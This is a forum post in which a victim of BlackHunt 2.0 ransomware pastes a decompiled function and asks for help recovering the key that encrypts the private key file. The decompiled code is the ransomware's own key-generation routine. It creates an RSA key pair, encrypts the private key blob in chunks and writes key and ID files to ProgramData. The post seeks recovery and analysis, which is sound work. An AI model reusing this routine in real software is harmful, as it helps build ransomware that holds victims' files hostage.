My computer has been infected with BlackHunt 2.0 and I’ve “decompiled” the executable with BinaryNinja. I think I’ve found the function that encrypts the PrivateKey file in the hard disk.
I think in some part there is something about the key that encrypts the private key file.
Can anyone help me please?
int32_t sub_402590() {
int32_t __saved_ebp;
int32_t eax_1 = (__security_cookie ^ & __saved_ebp);
if (data_479b08 != 0) {
sub_401d20(u "GenKey");
}
uint32_t var_c = 0;
void * var_24 = nullptr;
int32_t pdwDataLen = 0;
uint32_t i_11 = 0;
char * i;
do {
i = HeapAlloc(data_47a330, HEAP_ZERO_MEMORY, 0x140);
} while (i == 0);
if (CryptGenKey(data_478108, 1, 0x8000001, & data_47a32c) == 0) {
enum WIN32_ERROR var_40 = GetLastError();
sub_401d20(u "CryptGenKey Faild! GetLastError …");
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return 0;
}
if (CryptExportKey(data_47a32c, 0, 7, 0, nullptr, & pdwDataLen) == 0) {
enum WIN32_ERROR var_40_2 = GetLastError();
sub_401d20(u "CryptExportPrivateKey1 Faild! Ge…");
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return 0;
}
uint32_t dwBytes = (pdwDataLen + 0x40);
uint8_t * i_1;
do {
i_1 = HeapAlloc(data_47a330, HEAP_ZERO_MEMORY, dwBytes);
} while (i_1 == 0);
if (CryptExportKey(data_47a32c, 0, 7, 0, i_1, & pdwDataLen) == 0) {
enum WIN32_ERROR var_40_5 = GetLastError();
sub_401d20(u "CryptExportPrivateKey2 Faild! Ge…");
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return 0;
}
if (CryptExportKey(data_47a32c, 0, 6, 0, nullptr, & i_11) == 0) {
enum WIN32_ERROR var_40_7 = GetLastError();
sub_401d20(u "CryptExportKey1 Faild! GetLastEr…");
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return 0;
}
uint8_t * lpMem_1 = sub_4056b0(i_11);
int32_t ebx_7;
wchar16 *
const var_44_1;
if (lpMem_1 != 0) {
if (CryptExportKey(data_47a32c, 0, 6, 0, lpMem_1, & i_11) == 0) {
enum WIN32_ERROR var_40_10 = GetLastError();
var_44_1 = u "CryptExportKey2 Faild! GetLastEr…";
goto label_402a24;
}
BOOL eax_17 = CreateFileW(u "C:\ProgramData#BlackHunt_Privat…", 0x40000000, FILE_SHARE_NONE, nullptr, CREATE_NEW, SECURITY_ANONYMOUS, nullptr);
BOOL var_2c_1 = eax_17;
if (eax_17 == 0) {
eax_17 = CreateFileW(u "#BlackHunt_Private.key", 0x40000000, eax_17, eax_17, CREATE_NEW, eax_17, eax_17);
var_2c_1 = eax_17;
if (eax_17 == 0) {
sub_401d20(u "Cannot Create PrivKey File");
goto label_402a2c;
}
}
int32_t i_2 = 0;
int32_t i_7 = 0;
void lpNumberOfBytesWritten;
BOOL eax_18;
do {
BOOL j = 0;
do {
i[j] = 0;
j = (j + 1);
} while (j < 0x100);
void * j_1 = nullptr;
if (i_2 != 0) {
do {
eax_17 = * ((j_1 + i_1) + var_24);*(j_1 + i) = eax_17;
j_1 = (j_1 + 1);
} while (j_1 < 0xea);
var_c = 0xea;
} else {
do {
eax_17 = * ((j_1 + i_1) + var_24);*(j_1 + i) = eax_17;
j_1 = (j_1 + 1);
} while (j_1 < 0xec);
var_c = 0xec;
}
eax_18 = CryptEncrypt(data_47a328, 0, 1, 0, i, & var_c, 0x100);
if (eax_18 == 0) {
enum WIN32_ERROR var_40_20 = GetLastError();
var_44_1 = u "EncryptKey Faild! GetLastError =…";
break;
}
int32_t ebx_3;
ebx_3 = i_7 == 0;
if (WriteFile(var_2c_1, i, var_c, & lpNumberOfBytesWritten, nullptr) == 0) {
enum WIN32_ERROR var_40_19 = GetLastError();
var_44_1 = u "Cannot Write PrivKey To File! Ge…";
break;
}
var_24 = (var_24 + ((ebx_3 < < 1) + 0xea));
i_2 = (i_7 + 1);
i_7 = i_2;
} while (i_2 < 5);
if (eax_18 == 0) {
goto label_402a24;
}
CloseHandle(var_2c_1);
HANDLE eax_19 = CreateFileW(u "C:\ProgramData#BlackHunt_Public…", 0x40000000, FILE_SHARE_NONE, nullptr, CREATE_NEW, SECURITY_ANONYMOUS, nullptr);
HANDLE ebx_5 = eax_19;
if (ebx_5 == 0) {
ebx_5 = CreateFileW(u "#BlackHunt_Public.key", 0x40000000, eax_19, eax_19, CREATE_NEW, eax_19, eax_19);
if (ebx_5 == 0) {
sub_401d20(u "Cannot Create PubKey File");
goto label_402a2c;
}
}
if (WriteFile(ebx_5, lpMem_1, i_11, & lpNumberOfBytesWritten, nullptr) == 0) {
enum WIN32_ERROR var_40_14 = GetLastError();
var_44_1 = u "Cannot Write PubKey To File! Get…";
goto label_402a24;
}
CloseHandle(ebx_5);
if (CryptImportKey(data_478108, lpMem_1, i_11, 0, 0, & data_479b00) == 0) {
sub_401d20(u "Import PubKey failed!!\n");
goto label_402a2c;
}
HANDLE eax_24 = CreateFileW(u "C:\ProgramData#BlackHunt_ID.txt", 0x40000000, FILE_SHARE_NONE, nullptr, CREATE_NEW, SECURITY_ANONYMOUS, nullptr);
HANDLE ebx_6 = eax_24;
if (ebx_6 == 0) {
ebx_6 = CreateFileW(u "#BlackHunt_ID.txt", 0x40000000, eax_24, eax_24, CREATE_NEW, eax_24, eax_24);
if (ebx_6 == 0) {
sub_401d20(u "Cannot Create ID File");
goto label_402a2c;
}
}
sub_4022a0();
void * ecx_12 = nullptr;
int16_t i_3;
do {
i_3 = * (ecx_12 + 0x46f438);
ecx_12 = (ecx_12 + 2);*(ecx_12 + 0x47a2e2) = i_3;
} while (i_3 != 0);
if (WriteFile(ebx_6, & data_46f438, 0x20, & lpNumberOfBytesWritten, nullptr) == 0) {
enum WIN32_ERROR var_40_17 = GetLastError();
var_44_1 = u "Cannot Write ID To File! GetLast…";
goto label_402a24;
}
CloseHandle(ebx_6);
ebx_7 = 1;
} else {
enum WIN32_ERROR var_40_8 = GetLastError();
var_44_1 = u "PublicKeyBlob memory allocation …";
label_402a24: sub_401d20(var_44_1);
label_402a2c: ebx_7 = 0;
}
CryptDestroyKey(data_47a32c);
int32_t ecx_13 = pdwDataLen;
uint8_t * i_8 = i_1;
if (ecx_13 != 0) {
int32_t i_4;
do {
* i_8 = 0;
i_8 = & i_8[1];
i_4 = ecx_13;
ecx_13 = (ecx_13 - 1);
} while (i_4 != 1);
}
uint32_t i_10 = i_11;
char * lpMem = lpMem_1;
char * lpMem_2 = lpMem;
if (i_10 != 0) {
uint32_t i_5;
do {
* lpMem_2 = 0;
lpMem_2 = & lpMem_2[1];
i_5 = i_10;
i_10 = (i_10 - 1);
} while (i_5 != 1);
}
enum HEAP_FLAGS dwFlags = HEAP_CREATE_SEGMENT_HEAP;
char * i_9 = i;
enum HEAP_FLAGS i_6;
do {
* i_9 = 0;
i_9 = & i_9[1];
i_6 = dwFlags;
dwFlags = (dwFlags - 1);
} while (i_6 != HEAP_NO_SERIALIZE);
HeapFree(data_47a330, dwFlags, lpMem);
HeapFree(data_47a330, HEAP_NONE, i_1);
HeapFree(data_47a330, HEAP_NONE, i);
if (data_479b08 != 0) {
sub_401d20(u "return GenKey");
}
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return ebx_7;
}
Thanks.
I’m using AI to understand and find the critical functions.
New contributor
Fslynx is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.